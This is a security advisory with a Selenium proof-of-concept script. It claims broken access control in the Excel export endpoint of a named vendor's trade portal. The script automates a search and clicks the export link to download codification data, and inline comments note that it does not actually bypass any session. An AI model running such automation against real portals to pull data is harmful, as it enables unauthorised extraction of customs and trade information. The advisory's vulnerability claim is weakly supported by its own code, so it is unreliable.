============================================================================================================================================= | # Title : Webb Fontaine Trade Portal – Broken Access Control in Codification Export Endpoint Leads to Unauthorized Data Export | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://webbfontaine.com/fr/ | ============================================================================================================================================= [+] Summary : A security vulnerability was identified in the Webb Fontaine Trade Portal affecting the codification module (/trade/help/codification). The issue allows unauthorized users to trigger data export functionality via the /export/excel endpoint without proper validation of session state or user interaction. The backend fails to enforce strict access control and does not verify whether the export request originates from a legitimate user action. By initiating a crafted request after triggering a search operation, an attacker may retrieve sensitive codification data in Excel format. Additionally, the application relies on client-side interaction logic while lacking robust server-side verification, resulting in a Broken Access Control / Session Handling flaw. This vulnerability may allow unauthorized data extraction and represents a significant risk in environments handling sensitive trade and customs information. 
# [+] POC :
# Selenium browser-automation proof of concept for the advisory above.
# What it actually does (from the code, not the advisory wording): open the
# codification page, set the `reference` form field and click `search` via
# injected JavaScript, wait, then click the first anchor whose href contains
# 'export/excel' so Chrome downloads the file into BASE_DIR. Nothing in the
# script touches cookies or session tokens, so the "session bypass" label on
# the injected JavaScript is only the author's naming; the page is simply
# driven as a normal, already-reachable user would drive it.
# Defender's reading: the point the PoC demonstrates is that the export link
# is served and honoured on the basis of client-side steps alone. The fix
# belongs in the server: authorize /export/excel per request, independently
# of whether a search was "clicked" in the browser.
import os
import time
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# Download target on the author's machine; created at import time (module-level
# side effect), not inside the function.
BASE_DIR = r"C:\Users\sangrava\Desktop\SANGRAVA_LOGISTICS_HUB"
os.makedirs(BASE_DIR, exist_ok=True)


def run_sangrava_long_session():
    """Drive a Chrome session through search -> export and then idle for an hour.

    Side effects: launches a detached Chrome instance, may write an Excel file
    into BASE_DIR, and blocks for 3600 s at the end. Returns nothing; all
    outcomes are reported via print().
    """
    print("[*] Launching SANGRAVA Persistent Engine...")
    chrome_options = Options()
    # "detach" keeps the browser window alive after the driver object is gone,
    # which is why `finally` below deliberately does not call driver.quit().
    chrome_options.add_experimental_option("detach", True)
    # Silent downloads straight into BASE_DIR, no save-as prompt.
    prefs = {
        "download.default_directory": BASE_DIR,
        "download.prompt_for_download": False,
        "directory_upgrade": True,
        "safebrowsing.enabled": True
    }
    chrome_options.add_experimental_option("prefs", prefs)
    # webdriver_manager fetches a matching chromedriver on first run (network access).
    driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)
    driver.maximize_window()
    try:
        # Placeholder host as published in the advisory.
        url = "https://example/trade/help/codification?lang=en"
        print(f"[*] Navigating to: {url}")
        driver.get(url)
        wait = WebDriverWait(driver, 30)
        print("[*] Injecting session bypass values...")
        # Fills the 'reference' input, fires its change handler and clicks the
        # search button. Returns true/false to the driver, but the return value
        # is discarded below, so a missing field is not detected here.
        injection_script = """
        var field = document.getElementsByName('reference')[0];
        if(field) {
            field.value = 'attachedDocument';
            field.dispatchEvent(new Event('change'));
            document.getElementById('search').click();
            return true;
        }
        return false;
        """
        driver.execute_script(injection_script)
        print("[+] Search triggered. Waiting for server response...")
        # Fixed delay rather than waiting on a result element; fragile on slow
        # responses, but harmless for a manual PoC.
        time.sleep(10)
        print("[*] Attempting to grab the hidden Excel link...")
        try:
            # The export anchor is located by its href only; wait.until raises
            # selenium's TimeoutException after the 30 s configured above.
            excel_xpath = "//a[contains(@href, 'export/excel')]"
            excel_link = wait.until(EC.presence_of_element_located((By.XPATH, excel_xpath)))
            # JS click avoids "element not interactable" for a hidden/overlapped link.
            driver.execute_script("arguments[0].click();", excel_link)
            print("[SUCCESS] Download initiated.")
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
            # the intended case is TimeoutException (selenium.common.exceptions).
            print("[!] Excel link not found. It might be a session-only generation.")
        print("\n" + "="*50)
        print("[STAY ACTIVE] Browser will remain open for 60 minutes.")
        print("[ACTION] You can now interact with the browser manually.")
        print("="*50)
        # Keep the process (and thus the logged-in browser) alive for manual follow-up.
        time.sleep(3600)
    except Exception as e:
        print(f"[CRITICAL] Error: {e}")
    finally:
        # Intentionally no driver.quit(): see the "detach" option above.
        print("[*] Script execution finished. Detached session remains.")


if __name__ == "__main__":
    run_sangrava_long_session()

# Greetings to :==============================================================================
# jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
# ============================================================================================